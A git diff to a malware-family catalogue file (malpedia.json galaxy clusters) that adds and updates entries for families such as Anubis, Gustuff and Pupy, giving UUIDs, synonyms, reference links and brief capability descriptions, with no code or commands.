diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 0ede5457..28bd70b2 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -15,6 +15,21 @@ "type": "malpedia", "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash", + "https://www.us-cert.gov/ncas/alerts/TA18-275A", + "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", + "https://github.com/fboldewin/FastCashMalwareDissected/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", + "value": "FastCash" + }, { "description": "", "meta": { @@ -44,6 +59,32 @@ "uuid": "80447111-8085-40a4-a052-420926091ac6", "value": "AndroRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", + "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", + "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", + "https://pentest.blog/n-ways-to-unpack-mobile-malware/", + "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", + "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", + "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html" + ], + "synonyms": [ + "BankBot" + ], + "type": [] + }, + "uuid": "85975621-5126-40cb-8083-55cbfa75121b", + "value": "Anubis" + }, { "description": "", "meta": { @@ -86,23 +127,6 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", - "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html" - ], - "synonyms": [], - "type": [] - }, - "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot" - }, { "description": "", "meta": { @@ -143,13 +167,28 @@ "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", + "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2e230ff8-3971-4168-a966-176316cbdbf2", + "value": "Chamois" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", - "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" + "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html", + "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf" ], "synonyms": [], "type": [] @@ -190,6 +229,34 @@ "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", "value": "Clientor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper", + "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html", + "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", + "https://news.drweb.com/show?lng=en&i=12739" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e", + "value": "Clipper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot", + "https://twitter.com/LukasStefanko/status/1102937833071935491" + ], + "synonyms": [], + "type": [] + }, + "uuid": "151bf399-aa8f-4160-b9b5-8fe222f2a6b1", + "value": "CometBot" + }, { "description": "", "meta": { @@ -270,6 +337,35 @@ "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "value": "ExoBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", + "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", + "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store" + ], + "synonyms": [], + "type": [] + }, + "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8", + "value": "Exodus" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dd821edd-901b-4a5e-b35f-35bb811964ab", + "value": "FakeSpy" + }, { "description": "", "meta": { @@ -343,6 +439,19 @@ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat", + "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e111fff8-c73c-4069-b804-2d3732653481", + "value": "GoldenRAT" + }, { "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { @@ -357,6 +466,20 @@ "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32", "value": "GPlayed" }, + { + "description": "Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.\r\nThe analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", + "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "https://www.group-ib.com/media/gustuff/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f", + "value": "Gustuff" + }, { "description": "", "meta": { @@ -475,6 +598,19 @@ "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", "value": "LokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat", + "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1785a4dd-4044-4405-91c2-efb722801867", + "value": "LuckyCat" + }, { "description": "", "meta": { @@ -574,6 +710,19 @@ "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat", + "https://twitter.com/LukasStefanko/status/1084774825619537925" + ], + "synonyms": [], + "type": [] + }, + "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", + "value": "Premier RAT" + }, { "description": "", "meta": { @@ -593,7 +742,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", - "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html" + "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] @@ -647,6 +796,19 @@ "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker", + "https://twitter.com/LukasStefanko/status/1117795290155819008" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", + "value": "Sauron Locker" + }, { "description": "", "meta": { @@ -781,6 +943,21 @@ "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", + "https://twitter.com/LukasStefanko/status/1118066622512738304" + ], + "synonyms": [ + "Assassin RAT" + ], + "type": [] + }, + "uuid": "46151a0d-aa0a-466c-9fff-c2c3474f572e", + "value": "TalentRAT" + }, { "description": "", "meta": { @@ -855,7 +1032,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", @@ -934,6 +1111,20 @@ "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", + "value": "XLoader" + }, { "description": "", "meta": { @@ -947,6 +1138,32 @@ "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth", + "https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7", + "value": "YellYouth" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen", + "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "46d6d102-fc38-46f7-afdc-689cafe13de5", + "value": "Zen" + }, { "description": "", "meta": { @@ -978,6 +1195,36 @@ "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", + "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", + "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/" + ], + "synonyms": [ + "HyperShell" + ], + "type": [] + }, + "uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba", + "value": "TwoFace" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", + "value": "Unidentified ASP 001 (Webshell)" + }, { "description": "", "meta": { @@ -1071,15 +1318,34 @@ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r", + "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html", + "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/", + "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html" + ], + "synonyms": [ + "CriptTor" + ], + "type": [] + }, + "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", + "value": "Cr1ptT0r" + }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" ], "synonyms": [], "type": [] @@ -1113,6 +1379,19 @@ "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", + "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", + "value": "FBot" + }, { "description": "", "meta": { @@ -1165,11 +1444,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://threatlabs.avast.com/botnet", + "https://blog.avast.com/hide-n-seek-botnet-continues", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", - "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/" + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html" ], "synonyms": [ "HNS" @@ -1239,12 +1521,29 @@ "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, + { + "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", + "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", + "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", + "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" + ], + "synonyms": [ + "PureMasuta" + ], + "type": [] + }, + "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", + "value": "Masuta" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", - "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" + "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] @@ -1265,7 +1564,8 @@ "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/" ], "synonyms": [], "type": [] @@ -1377,6 +1677,19 @@ "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, + { + "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", + "https://github.com/n1nj4sec/pupy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", + "value": "pupy (ELF)" + }, { "description": "", "meta": { @@ -1474,6 +1787,19 @@ "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup", + "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", + "value": "SpeakUp" + }, { "description": "", "meta": { @@ -1500,6 +1826,19 @@ "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless", + "https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", + "value": "Sunless" + }, { "description": "", "meta": { @@ -1533,16 +1872,18 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report", - "https://www.8ackprotect.com/blog/big_brother_is_attacking_you" + "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", + "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/" ], "synonyms": [ "Amnesia", + "Muhstik", "Radiation" ], "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami" + "value": "Tsunami (ELF)" }, { "description": "", @@ -1670,9 +2011,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", - "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", - "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", - "https://en.wikipedia.org/wiki/Xor_DDoS" + "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" ], "synonyms": [], "type": [] @@ -1695,6 +2036,23 @@ "uuid": "9218630d-0425-4b18-802c-447a9322990d", "value": "Zollard" }, + { + "description": "Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad", + "https://github.com/Hopfengetraenk/Fas-Disasm", + "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft" + ], + "synonyms": [ + "Acad.Bursted", + "Duxfas" + ], + "type": [] + }, + "uuid": "fb22d876-c6b5-4634-a468-5857088d605c", + "value": "AutoCAD Downloader" + }, { "description": "", "meta": { @@ -1739,6 +2097,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "http://malware-traffic-analysis.net/2017/07/04/index.html", @@ -1759,6 +2118,21 @@ "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", + "https://colin.guru/index.php?title=Advanced_Banload_Analysis", + "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload" + ], + "synonyms": [], + "type": [] + }, + "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043", + "value": "Banload" + }, { "description": "", "meta": { @@ -1775,14 +2149,41 @@ "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat", + "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3724d5d0-860d-4d1e-92a1-0a7089ca2bb3", + "value": "FEimea RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", + "https://twitter.com/r3c0nst/status/1111254169623674882" + ], + "synonyms": [], + "type": [] + }, + "uuid": "71286008-9794-4dcc-a571-164195390c39", + "value": "JavaDispCash" + }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://github.com/java-rat", - "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" + "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/" ], "synonyms": [ "Jacksbot" @@ -1819,6 +2220,19 @@ "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", + "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb", + "value": "Qealler" + }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { @@ -1851,12 +2265,29 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot", + "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" + ], + "synonyms": [ + "BlazeBot" + ], + "type": [] + }, + "uuid": "651e37e0-1bf8-4024-ac1e-e7bda42470b0", + "value": "SupremeBot" + }, + { + "description": "AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" ], - "synonyms": [], + "synonyms": [ + "Orz" + ], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", @@ -1875,11 +2306,25 @@ "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, + { + "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ebeb691-b979-4a88-94e1-dade780c6a7f", + "value": "BELLHOP" + }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", + "https://www.codercto.com/a/46729.html", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], @@ -1917,6 +2362,35 @@ "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", "value": "CukieGrab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [ + "DNSbot" + ], + "type": [] + }, + "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e", + "value": "DNSRat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3", + "value": "EVILNUM (Javascript)" + }, { "description": "", "meta": { @@ -1950,7 +2424,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", - "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" + "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", + "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/" ], "synonyms": [], "type": [] @@ -1968,6 +2444,7 @@ "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" ], @@ -1979,6 +2456,22 @@ "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, + { + "description": "NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", + 